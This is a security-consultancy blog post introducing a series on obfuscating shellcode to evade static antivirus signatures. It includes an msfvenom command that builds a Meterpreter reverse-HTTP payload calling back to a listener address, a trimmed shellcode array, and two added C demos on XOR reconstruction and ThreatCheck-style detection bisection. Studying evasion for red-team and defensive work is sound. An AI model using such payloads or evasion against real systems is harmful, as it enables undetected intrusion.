Adventures in Shellcode Obfuscation! Part 1: Overview

By Red Siege | June 17, 2024

by Mike Saunders, Principal Security Consultant

This blog is the first in a series of articles on methods for obfuscating shellcode. I’ll be focusing on how to obfuscate shellcode so that its bytes don’t trip static, signature-based detection. I won’t be covering techniques such as direct syscalls, unhooking, etc., which are aimed at evading behavioral detections. The focus will be on showing different means of hiding the shellcode bytes themselves.


What is Shellcode?

The Wikipedia entry for shellcode defines shellcode as such:
In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.


Side Note

We could write shellcode by hand, generate Metasploit payloads using msfvenom, or generate shellcode from one of the many available command and control suites like Cobalt Strike, Havoc, Sliver, etc. For this series, I’ll be using msfvenom to generate a windows/x64/meterpreter/reverse_http payload.
To ensure any detection (or lack thereof) is only the result of the shellcode or obfuscation technique, I won’t be writing a full loader. All my example programs will do is reconstruct the shellcode back to its original form and spit out the array so we can compare the reconstructed shellcode with the original shellcode bytes.
For my demonstrations, I’ll be developing payloads on a Windows 10 Professional 22H2 system with Windows Defender. I’ll be compiling the example programs using Visual Studio 2019 and cl.exe from the x64 Native Tools Command Prompt. I’ll be using ThreatCheck to demonstrate whether a payload is detected by Defender. I’ll also upload these examples to VirusTotal to see how they fare against a variety of AV & EDR engines.
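As an added illustration of the kind of harness described above (this is example code written for this edit, not code from the Red Siege series), the program below holds a byte array, applies a placeholder transform, reconstructs the bytes, and prints them in the same `0x..,` layout so the two arrays can be diffed. The single-byte XOR is assumed here purely as a stand-in for the obfuscation methods the later parts cover, and the sample bytes are constructed filler (the first ten copied from the listing further down, the rest made up), not a working payload.

```c
/* Added example: a minimal "reconstruct and print" harness.
 * Not from the Red Siege series. The XOR transform is a placeholder
 * standing in for the techniques covered later; the bytes are filler. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed sample bytes: first ten from the msfvenom listing, rest filler. */
static const unsigned char original[] = {
    0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00,
    0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2
};
#define ORIGINAL_LEN (sizeof original)

/* Placeholder transform: XOR every byte with one key byte. XOR is its own
 * inverse, so the same routine obfuscates and reconstructs. */
static void xor_transform(const unsigned char *in, size_t len,
                          unsigned char key, unsigned char *out)
{
    for (size_t i = 0; i < len; i++)
        out[i] = in[i] ^ key;
}

/* Print in the same "0x..," layout msfvenom emits, ten bytes per line. */
static void print_array(const char *name, const unsigned char *buf, size_t len)
{
    printf("unsigned char %s[%zu] = {", name, len);
    for (size_t i = 0; i < len; i++) {
        if (i % 10 == 0) printf("\n    ");
        printf("0x%02x%s", buf[i], i + 1 < len ? "," : "");
    }
    printf("\n};\n");
}

/* 1 if obfuscate-then-reconstruct with this key reproduces the original exactly. */
int roundtrip_matches(unsigned char key)
{
    unsigned char obfuscated[ORIGINAL_LEN];
    unsigned char rebuilt[ORIGINAL_LEN];
    xor_transform(original, ORIGINAL_LEN, key, obfuscated);
    xor_transform(obfuscated, ORIGINAL_LEN, key, rebuilt);
    return memcmp(rebuilt, original, ORIGINAL_LEN) == 0;
}

/* 1 if the obfuscated bytes differ from the original, i.e. the raw bytes are
 * no longer sitting in the binary. A key of 0x00 changes nothing. */
int obfuscated_differs(unsigned char key)
{
    unsigned char obfuscated[ORIGINAL_LEN];
    xor_transform(original, ORIGINAL_LEN, key, obfuscated);
    return memcmp(obfuscated, original, ORIGINAL_LEN) != 0;
}

int main(void)
{
    const unsigned char key = 0x5a; /* assumed demo key */
    unsigned char obfuscated[ORIGINAL_LEN], rebuilt[ORIGINAL_LEN];
    xor_transform(original, ORIGINAL_LEN, key, obfuscated);
    xor_transform(obfuscated, ORIGINAL_LEN, key, rebuilt);
    print_array("obfuscated", obfuscated, ORIGINAL_LEN);
    print_array("rebuilt", rebuilt, ORIGINAL_LEN);
    printf("reconstruction %s\n", roundtrip_matches(key) ? "OK" : "FAILED");
    return 0;
}
```

The point of the `memcmp` is that a reconstruction bug will show up as a silent mismatch long before a loader would; comparing the printed arrays by eye against msfvenom’s output is the same check done manually.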


Why We Hide

If you’re using msfvenom or a well-known C2 to generate shellcode, the chances are you’re going to get detected by pretty much any modern AV or EDR. Consider the following C program. It has shellcode stored in a variable and it prints out a message. It doesn’t use the shellcode in any way.

#include <windows.h>
#include <stdio.h>


// compile: cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcnoobfuscation.c /link /out:noobfuscation.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
// msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.190.134 LPORT=80 -f csharp | tr -d \\n
// The array is never referenced by the code; it only sits in the binary's data section.
unsigned char shellcode[563] = {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,
...trimmed...
0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5};


int main(void)
{
    printf("All this program does is store shellcode and print this message.\n");
    return 0;
}


If we build this program and scan it with ThreatCheck, we can see Defender is definitely detecting our shellcode. If you look at the highlighted bytes, you’ll see they match up with the last few bytes of our shellcode variable. That is a consequence of how ThreatCheck works: it scans progressively shorter copies of the file to find the offset at which Defender stops flagging it, so the bytes it highlights are the tail end of whatever Defender matched on, not the whole signature.


Meterpreter Detected
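To make the “last few bytes” observation concrete, here is an added example (written for this edit, not ThreatCheck’s own code) of the prefix-bisection idea behind ThreatCheck-style tools. A stand-in “engine” flags any buffer that contains a constructed five-byte signature (made-up values, not a real Defender rule); the search then finds the shortest prefix of the file that is still flagged. The bytes immediately before that cut-off are the end of the signature, which is exactly why the highlighted bytes line up with the end of the array.

```c
/* Added example: prefix bisection to locate where a detection "ends".
 * Not ThreatCheck's code; the scanner and signature are constructed. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed 5-byte signature. Made-up values, not a real AV rule. */
static const unsigned char signature[] = { 0x49, 0xc7, 0xc2, 0xf0, 0xb5 };

/* Stand-in for "write the prefix to disk and let the AV scan it":
 * returns 1 if the signature appears anywhere in buf[0..len). */
int scan_flags(const unsigned char *buf, size_t len)
{
    size_t sl = sizeof signature;
    if (len < sl) return 0;
    for (size_t i = 0; i + sl <= len; i++)
        if (memcmp(buf + i, signature, sl) == 0) return 1;
    return 0;
}

/* Binary search for the smallest prefix length that is still flagged.
 * Returns that length, or 0 if the whole buffer is clean. */
size_t find_detection_end(const unsigned char *buf, size_t len)
{
    if (!scan_flags(buf, len)) return 0;
    size_t lo = 1, hi = len;            /* invariant: prefix of length hi is flagged */
    while (lo < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (scan_flags(buf, mid)) hi = mid; else lo = mid + 1;
    }
    return hi;
}

/* Print the bytes just before the cut-off, the way ThreatCheck-style output
 * highlights them; at most 'window' bytes. */
static void print_offending(const unsigned char *buf, size_t end, size_t window)
{
    size_t start = end > window ? end - window : 0;
    printf("detection ends at offset %zu; preceding bytes:", end);
    for (size_t i = start; i < end; i++) printf(" %02x", buf[i]);
    printf("\n");
}

/* Build a constructed 64-byte "file image" of NOP filler, optionally plant the
 * signature at offset 40, and return where detection ends (45 when planted,
 * because the signature occupies offsets 40..44). */
size_t demo_detection_end(int plant_signature)
{
    unsigned char image[64];
    memset(image, 0x90, sizeof image);
    if (plant_signature)
        memcpy(image + 40, signature, sizeof signature);
    return find_detection_end(image, sizeof image);
}

int main(void)
{
    unsigned char image[64];
    memset(image, 0x90, sizeof image);
    memcpy(image + 40, signature, sizeof signature);
    size_t end = find_detection_end(image, sizeof image);
    if (end) print_offending(image, end, 16);
    else printf("clean\n");
    return 0;
}
```

Against a real engine each probe is a file write plus a scan, so the bisection is what keeps the number of probes to roughly log2(file size) rather than one per byte. It also explains a practical caveat: if a binary carries two independent signatures, this search only ever reports the one that ends first.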


VirusTotal shows 23 of 73 vendors detected this as some kind of malware. This definitely seems low, but because I never actually used the shellcode, vendors who focus on behavioral analysis may not detect this program as malicious.


VirusTotal Detection

Modifying the program to load and execute the shellcode shows a few more vendors detected the program – 27 of 72.

VirusTotal Detection


Until Next Time

At this point, it should be obvious why we need to obfuscate our shellcode. We want our loaders to have a chance. If we don’t protect our shellcode, it’s likely our payload is going to get blown up the second it touches our target system. In the rest of the series, we’re going to look at different means of obfuscating shellcode that can help us get our payloads to our target without getting detected.


Try it Yourself

If you’d like to follow along with this series, you can find the code for these articles on the Red Siege GitHub.

About Principal Security Consultant Mike Saunders

Mike Saunders is Red Siege Information Security’s Principal Consultant. Mike has over 25 years of IT and security expertise, having worked in the ISP, banking, insurance, and agriculture businesses. Mike gained knowledge in a range of roles throughout his career, including system and network administration, development, and security architecture. Mike is a highly regarded and experienced international speaker with notable cybersecurity talks at conferences such as DerbyCon, Circle City Con, SANS Enterprise Summit, and NorthSec, in addition to having more than a decade of experience as a penetration tester. You can find Mike’s in-depth technical blogs and tool releases online and learn from his several offensive and defensive-focused SiegeCasts. He has been a member of the NCCCDC Red Team on several occasions and is the Lead Red Team Operator for Red Siege Information Security.

Certifications:
GCIH, GPEN, GWAPT, GMOB, CISSP, and OSCP

